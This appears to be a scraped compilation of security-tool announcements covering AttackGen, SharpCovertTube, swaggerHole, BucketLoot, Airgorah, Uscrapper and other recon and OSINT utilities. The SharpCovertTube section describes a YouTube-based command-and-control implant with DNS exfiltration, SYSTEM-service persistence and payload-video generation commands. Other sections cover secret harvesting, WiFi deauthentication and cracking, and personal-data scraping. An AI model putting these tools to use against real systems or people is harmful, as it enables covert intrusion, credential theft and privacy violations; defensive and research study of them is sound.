    - Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
    LangSmith for Azure OpenAI Service - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.

    - User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
    Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
    Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

    v0.2

    What's new? Why is it useful?
    Custom Scenarios based on ATT&CK Techniques - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.

    - Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
    User feedback on generated scenarios - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
    Improved error handling for missing API keys - Improved user experience.
    Replaced Streamlit st.spinner widgets with new st.status widget - Provides better visibility into long running processes (i.e. scenario generation).

    v0.1

    Initial release.

    Requirements

    • Recent version of Python.
    • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
    • OpenAI API key.
    • LangChain API key (optional) - see LangSmith Setup section below for further details.
    • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

    Installation

    Option 1: Cloning the Repository

    1. Clone this repository:
    git clone https://github.com/mrwadams/attackgen.git
    1. Change directory into the cloned repository:
    cd attackgen
    1. Install the required Python packages:
    pip install -r requirements.txt

    Option 2: Using Docker

    1. Pull the Docker container image from Docker Hub:
    docker pull mrwadams/attackgen

    LangSmith Setup

    If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

    If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.

    Data Setup

    Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/ directory within the repository.

    Running AttackGen

    After the data setup, you can run AttackGen with the following command:

    streamlit run πŸ‘‹_Welcome.py

    You can also try the app on Streamlit Community Cloud.

    Usage

    Running AttackGen

    Option 1: Running the Streamlit App Locally

    1. Run the Streamlit app:
    streamlit run πŸ‘‹_Welcome.py
    1. Open your web browser and navigate to the URL provided by Streamlit.
    2. Use the app to generate standard or custom incident response scenarios (see below for details).

    Option 2: Using the Docker Container Image

    1. Run the Docker container:
    docker run -p 8501:8501 mrwadams/attackgen

    This command will start the container and map port 8501 (default for Streamlit apps) from the container to your host machine. 2. Open your web browser and navigate to http://localhost:8501. 3. Use the app to generate standard or custom incident response scenarios (see below for details).

    Generating Scenarios

    Standard Scenario Generation

    1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
    2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
    3. Select your organisatin's industry and size from the dropdown menus.
    4. Navigate to the Threat Group Scenarios page.
    5. Select the Threat Actor Group that you want to simulate.
    6. Click on 'Generate Scenario' to create the incident response scenario.
    7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

    Custom Scenario Generation

    1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
    2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
    3. Select your organisation's industry and size from the dropdown menus.
    4. Navigate to the Custom Scenario page.
    5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
    6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
    7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

    Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

    Contributing

    I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

    Licence

    This project is licensed under GNU GPLv3.



    Rrgen - A Header Only C++ Library For Storing Safe, Randomly Generated Data Into Modern Containers

    By: Zion3R


    This library was developed to combat insecure methods of storing random data into modern C++ containers. For example, old and clunky PRNGs. Thus, rrgen uses STL's distribution engines in order to efficiently and safely store a random number distribution into a given C++ container.


    Installation

    1) git clone https://github.com/josh0xA/rrgen.git
    2) cd rrgen
    3) make
    4) Add include/rrgen.hpp to your project tree for access to the library classes and functions.

    Official Documentation

    rrgen/docs/index.rst

    Supported Containers

    1) std::vector<>
    2) std::list<>
    3) std::array<>
    4) std::stack<>

    Example Usages

    #include "../include/rrgen.hpp"
    #include <iostream>

    int main(void)
    {
    // Example usage for rrgen vector
    rrgen::rrand<float, std::vector, 10> rrvec;
    rrvec.gen_rrvector(false, true, 0, 10);
    for (auto &i : rrvec.contents())
    {
    std::cout << i << " ";
    } // ^ the same as rrvec.show_contents()

    // Example usage for rrgen list (frontside insertion)
    rrgen::rrand<int, std::list, 10> rrlist;
    rrlist.gen_rrlist(false, true, "fside", 5, 25);
    std::cout << '\n'; rrlist.show_contents();
    std::cout << "Size: " << rrlist.contents().size() << '\n';

    // Example usage for rrgen array
    rrgen::rrand_array<int, 5> rrarr;
    rrarr.gen_rrarray(false, true, 5, 35);
    for (auto &i : rrarr.contents())
    {
    std::cout << i << " ";
    } // ^ the same as rrarr. show_contents()

    // Example usage for rrgen stack
    rrgen::rrand_stack<float, 10> rrstack;
    rrstack.gen_rrstack(false, true, 200, 1000);
    for (auto m = rrstack.xsize(); m > 0; m--)
    {
    std::cout << rrstack.grab_top() << " ";
    rrstack.pop_off();
    if (m == 1) { std::cout << '\n'; }
    }
    }

    Note: This is a transferred repository, from a completely unrelated project.



    Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals

    By: Zion3R


    Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


    Pentest Muse Web App

    In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.

    Disclaimer

    This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

    Requirements

    • Python 3.12 or later
    • Necessary Python packages as listed in requirements.txt

    Setup

    Standard Setup

    1. Clone the repository:

    git clone https://github.com/pentestmuse-ai/PentestMuse cd PentestMuse

    1. Install the required packages:

    pip install -r requirements.txt

    Alternative Setup (Package Installation)

    Install Pentest Muse as a Python Package:

    pip install .

    Running the Application

    Chat Mode (Default)

    In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

    python run_app.py

    or

    pmuse

    Agent Mode (Experimental)

    You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program with agent model, you can use:

    python run_app.py agent

    or

    pmuse agent

    Selection of Language Models

    Managed APIs

    You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.

    OpenAI API keys

    Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key] when starting the program.

    Contact

    For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.



    Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

    By: Zion3R

    About

    skytrack is a command-line based plane spotting and aircraft OSINT reconnaissanceΒ tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purposeΒ reconnaissance.


    What is Planespotting & Aircraft OSINT?

    Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft informationΒ gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject β€” in this case planes!

    Aircraft Information

    • Tail Number πŸ›«
    • Aircraft Type βš™οΈ
    • ICAO24 Designation πŸ”Ž
    • Manufacturer Details πŸ› 
    • Flight Logs πŸ“„
    • Aircraft Owner ✈️
    • Model πŸ›©
    • Much more!

    Usage

    To run skytrack on your machine, follow the steps below:

    $ git clone https://github.com/ANG13T/skytrack
    $ cd skytrack
    $ pip install -r requirements.txt
    $ python skytrack.py

    skytrack works best for Python version 3.

    Preview

    Features

    skytrack features three main functions for aircraft information

    gathering and display options. They include the following:

    Aircraft Reconnaissance & OSINT

    skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

    PDF Aircraft Information Report

    skytrack also enables you the save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"

    Tail Number to ICAO Converter

    There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft

    reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

    Further Explanation

    ICAO and Tail Numbers follow a mapping system like the following:

    ICAO address N-Number (Tail Number)

    a00001 N1

    a00002 N1A

    a00003 N1AA

    You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)

    :warning: Converter only works for USA-registered aircraft

    Data Sources & APIs Used

    ICAO Aircraft Type Designators Listings

    FlightAware

    Wikipedia

    Aviation Safety Website

    Jet Photos Website

    OpenSky API

    Aviation Weather METAR

    Airport Codes Dataset

    Contributing

    skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

    Upcoming

    • Obtain Latest Flown Airports
    • Obtain Airport Information
    • Obtain ATC Frequency Information

    Support

    If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

    To check out my other works, visit my GitHub profile.



    Dorkish - Chrome Extension Tool For OSINT & Recon

    By: Zion3R


    During reconaissance phase or when doing OSINT , we often use google dorking and shodan and thus the idea of Dorkish.
    Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using the builder and it offers prebuilt dorks for efficient reconnaissance and OSINT engagement.


    Installation And Setup

    1- Clone the repository

    git clone https://github.com/yousseflahouifi/dorkish.git

    2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.
    3- click on Load unpacked extension button and select the dorkish folder.

    Note: For firefox users , you can find the extension here : https://addons.mozilla.org/en-US/firefox/addon/dorkish/

    Features

    Google dorking

    • Builder with keywords to filter your google search results.
    • Prebuilt dorks for Bug bounty programs.
    • Prebuilt dorks used during the reconnaissance phase in bug bounty.
    • Prebuilt dorks for exposed files and directories
    • Prebuilt dorks for logins and sign up portals
    • Prebuilt dorks for cyber secruity jobs

    Shodan dorking

    • Builder with filter keywords used in shodan.
    • Varierty of prebuilt dorks to find IOT , Network infrastructure , cameras , ICS , databases , etc.

    Usage

    Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.

    TODO

    • Add more useful dorks and catogories
    • Fix some bugs
    • Add a search bar to search through the results
    • Might add some LLM models to build dorks

    Notes

    I have built some dorks and I have used some public resources to gather the dorks , here's few : - https://github.com/lothos612/shodan - https://github.com/TakSec/google-dorks-bug-bounty

    Warning

    • I am not responsible for any damage caused by using the tool


    SharpCovertTube - Youtube As Covert-Channel - Control Windows Systems Remotely And Execute Commands By Uploading Videos To Youtube

    By: Zion3R


    SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.

    The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The QR codes in the videos can use cleartext or AES-encrypted values.

    It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a persistence method using only web requests to the Google API.



    Usage

    Run the listener in your Windows system:

    It will check the Youtube channel every a specific amount of time (10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder example-videos:

    After finding there is a new video in the channel, it decodes the QR code from the video thumbnail, executes the command and the response is base64-encoded and exfiltrated using DNS:

    This works also for QR codes with AES-encrypted payloads and longer command responses. In this example, the file "dirtemp_aes.avi" from example-videos is uploaded and the content of c:\temp is exfiltrated using several DNS queries:

    Logging to a file is optional but you must check the folder for that file exists in the system, the default value is "c:\temp\.sharpcoverttube.log". DNS exfiltration is also optional and can be tested using Burp's collaborator:

    As an alternative, I created this repository with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.


    Configuration

    There are some values you can change, you can find them in Configuration.cs file for the regular binary and the service binary. Only the first two have to be updated:

    • channel_id (Mandatory!!!): Get your Youtube channel ID from here.
    • api_key (Mandatory!!!): To get the API key create an application and generate the key from here.
    • payload_aes_key (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-characters string.
    • payload_aes_iv (Optional. Default: "0000000000000000"): IV key for decrypting QR codes (if using AES). It must be a 16-characters string.
    • seconds_delay (Optional. Default: 600): Seconds of delay until checking if a new video has been uploaded. If the value is low you will exceed the API rate limit.
    • debug_console (Optional. Default: true): Show debug messages in console or not.
    • log_to_file (Optional. Default: true): Write debug messages in log file or not.
    • log_file (Optional. Default: "c:\temp\.sharpcoverttube.log"): Log file path.
    • dns_exfiltration (Optional. Default: true): Exfiltrate command responses through DNS or not.
    • dns_hostname (Optional. Default: ".test.org"): DNS hostname to exfiltrate the response from commands executed in the system.


    Generating videos with QR codes

    You can generate the videos from Windows using Python3. For that, first install the dependencies:

    pip install Pillow opencv-python pyqrcode pypng pycryptodome rebus

    Then run the generate_video.py script:

    python generate_video.py -t TYPE -f FILE -c COMMAND [-k AESKEY] [-i AESIV]
    • TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.

    • FILE (-f) is the path where the video is generated.

    • COMMAND (-c) is the command to execute in the system.

    • AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.

    • AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.


    Examples

    Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:

    python generate_video.py -t qr -f c:\temp\whoami.avi -c whoami

    Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:

    python generate_video.py -t qr_aes -f c:\temp\dirtemp_aes.avi -c "dir c:\windows\temp" -k 0000000000000000 -i 0000000000000000



    Running it as a service

    You can find the code to run it as a service in the SharpCovertTube_Service folder. It has the same functionalities except self-deletion, which would not make sense in this case.

    It possible to install it with InstallUtil, it is prepared to run as the SYSTEM user and you need to install it as administrator:

    InstallUtil.exe SharpCovertTube_Service.exe

    You can then start it with:

    net start "SharpCovertTube Service"

    In case you have administrative privileges this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). If you do not have those privileges you can not install services so you can only use the ordinary binary.


    Notes
    • File must be 64 bits!!! This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's QR-Capture project, who borrowed part of it from Uzi Granot's QRCode project, who at the same time borrowed part of it from Zakhar Semenov's Camera_Net project (then I lost track). So thanks to all of them!

    • This project is a port from covert-tube, a project I developed in 2021 using just Python, which was inspired by Welivesecurity blogs about Casbaneiro and Numando malwares.



    swaggerHole - A Python3 Script Searching For Secret On Swaggerhub

    By: Zion3R


    IntroductionΒ 

    This tool is made to automate the process of retrieving secrets in the public APIs on [swaggerHub](https://app.swaggerhub.com/search). This tool is multithreaded and pipe mode is available :)Β 

    RequirementsΒ 

    Β - python3 (sudo apt install python3) - pip3 (sudo apt install python3-pip) ## Installation
    pip3 install swaggerhole
    or cloning this repository and running
    git clone https://github.com/Liodeus/swaggerHole.git
    pip3 install .

    Usage

       _____ _      __ ____ _ ____ _ ____ _ ___   _____
    / ___/| | /| / // __ `// __ `// __ `// _ \ / ___/
    (__ ) | |/ |/ // /_/ // /_/ // /_/ // __// /
    /____/ |__/|__/ \__,_/ \__, / \__, / \___//_/
    __ __ __ /____/ /____/
    / / / /____ / /___
    / /_/ // __ \ / // _ \
    / __ // /_/ // // __/
    /_/ /_/ \____//_/ \___/

    usage: swaggerhole [-h] [-s SEARCH] [-o OUT] [-t THREADS] [-j] [-q] [-du] [-de]

    optional arguments:
    -h, --help show this help message and exit
    -s SEARCH, --search SEARCH
    Term to search
    -o OUT, --out OUT Output directory
    -t THREADS, --threads THREADS
    Threads number (Default 25)
    -j, --json Json ouput
    -q, --quiet Remove banner
    -du, --deactivate_url
    Deactivate the URL filtering
    -de, --deactivate_email
    Deactivate the email filtering

    Search for secret about a domain

    swaggerHole -s test.com

    echo test.com | swaggerHole

    Search for secret about a domain and output to json

    swaggerHole -s test.com --json

    echo test.com | swaggerHole --json

    Search for secret about a domain and do it fast :)

    swaggerHole -s test.com -t 100

    echo test.com | swaggerHole -t 100

    Output explanation

    Normal output

    Β `Finding_Type - Finding - [Swagger_Name][Date_Last_Update][Line:Number]`Β 

    Json output

    Β `{"Finding_Type": Finding, "File": File_path, "Date": Date_Last_Update, "Line": Number}`Β 

    Deactivate url/emailΒ 

    Using -du or -de remove the filtering done by the tool. There is more false positive with those options.Β 

    RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains

    By: Zion3R


    RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.


    Features
    • Automated scanning of domains and subdomains for exposed .git repositories.
    • Streamlines the detection of sensitive data exposures.
    • User-friendly command-line interface.
    • Ideal for security audits and Bug Bounty.

    Installation

    Clone the repository and install the required dependencies:

    git clone https://github.com/YourUsername/RepoReaper.git
    cd RepoReaper
    pip install -r requirements.txt
    chmod +x RepoReaper.py

    Usage

    RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.

    To start RepoReaper, simply run:

    ./RepoReaper.py
    or
    python3 RepoReaper.py

    Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains: Enter the path of the file containing domains

    Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:

    example.com
    subdomain.example.com
    anotherdomain.com

    RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.Β 


    Disclaimer

    This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.



    AzSubEnum - Azure Service Subdomain Enumeration

    By: Zion3R


    AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.


    How it works?

    AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

    With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.


    Why i create this?

    During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.


    Usage
    ➜  AzSubEnum git:(main) βœ— python3 azsubenum.py --help
    usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

    Azure Subdomain Enumeration

    options:
    -h, --help show this help message and exit
    -b BASE, --base BASE Base name to use
    -v, --verbose Show verbose output
    -t THREADS, --threads THREADS
    Number of threads for concurrent execution
    -p PERMUTATIONS, --permutations PERMUTATIONS
    File containing permutations

    Basic enumeration:

    python3 azsubenum.py -b retailcorp --thread 10

    Using permutation wordlists:

    python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt

    With verbose output:

    python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose




    Argus - A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions

    By: Zion3R

    This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.

    Visit our website - secureci.org for more information.


    Features

    • Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.

    • Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.

    Usage

    This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.

    python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]

    Parameters:

    • --mode: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.
    • --url: The GitHub URL. Use USERNAME:TOKEN@URL for private repos. This parameter is required.
    • --output-folder: The output folder. The default value is '/tmp'. This parameter is optional.
    • --config: The config file. This parameter is optional.
    • --verbose: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.
    • --branch: The branch name. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
    • --commit: The commit hash. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
    • --tag: The tag. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
    • --action-path: The (relative) path to the action. You cannot provide --action-path in repo mode. This parameter is optional.
    • --workflow-path: The (relative) path to the workflow. You cannot provide --workflow-path in action mode. This parameter is optional.

    Example:

    To use this script to interact with a GitHub repo, you might run a command like the following:

    python argus.py --mode repo --url https://github.com/username/repo.git --branch master

    This would run the script in repo mode on the master branch of the specified repository.

    How to use

    Argus can be run inside a docker container. To do so, follow the steps:

    • Install docker and docker-compose
      • apt-get -y install docker.io docker-compose
    • Clone the release branch of this repo
      • git clone <>
    • Build the docker container
      • docker-compose build
    • Now you can run argus. Example run:
      • docker-compose run argus --mode {mode} --url {url to target repo}
    • Results will be available inside the results folder

    Viewing SARIF Results

    You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.

    1. Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.

    2. VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.

    Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.

    Troubleshooting

    If there is an issue with needing the Github authorization for running, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all the requests made to Github. Note, we do not store this information anywhere, neither create any thing in the Github account - we only use this for cloning the repositories.

    Contributions

    Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!

    Cite Argus

    If you use Argus in your research, please cite our paper:

      @inproceedings{muralee2023Argus,
    title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
    author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
    A. Kapravelos, A. Machiry},
    booktitle={32st USENIX Security Symposium (USENIX Security 23)},
    year={2023},
    }


    BucketLoot - An Automated S3-compatible Bucket Inspector

    By: Zion3R


    BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

    The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

    BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

    Features

    Secret Scanning

    Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

    Sensitive File Checks

    Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

    Dig Mode

    Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

    Asset Extraction

    Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

    Searching

    The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

    To know more about our Attack Surface Management platform, check out NVADR.



    Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

    By: Zion3R


    Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

    It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

    ⭐ Don't forget to put a star if you like the project!

    Legal

    Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.

    Requirements

    This software only works on linux and requires root privileges to run.

    You will also need a wireless network card that supports monitor mode and packet injection.

    Installation

    The installation instructions are available here.

    Usage

    The documentation about the usage of the application is available here.

    License

    This project is released under MIT license.

    Contributing

    If you have any question about the usage of the application, do not hesitate to open a discussion

    If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request



    Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

    By: Zion3R


    Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.


    Extracted Details:

    Uscrapper extracts the following details from the provided website:

    • Email Addresses: Displays email addresses found on the website.
    • Social Media Links: Displays links to various social media platforms found on the website.
    • Author Names: Displays the names of authors associated with the website.
    • Geolocations: Displays geolocation information associated with the website.
    • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.

    Whats New?:

    Uscrapper 2.0:

    • Introduced multiple modules to bypass anti-webscrapping techniques.
    • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
    • Implemented Multithreading to make these processes faster.

    Installation Steps:

    git clone https://github.com/z0m31en7/Uscrapper.git
    cd Uscrapper/install/ 
    chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

    Usage:

    To run Uscrapper, use the following command-line syntax:

    python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


    Arguments:

    • -h, --help: Show the help message and exit.
    • -u URL, --url URL: Specify the URL of the website to extract details from.
    • -c INT, --crawl INT: Specify the number of links to crawl
    • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
    • -O, --generate-report: Generate a report file containing the extracted details.
    • -ns, --nonstrict: Display non-strict usernames during extraction.

    Note:

    • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

    • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

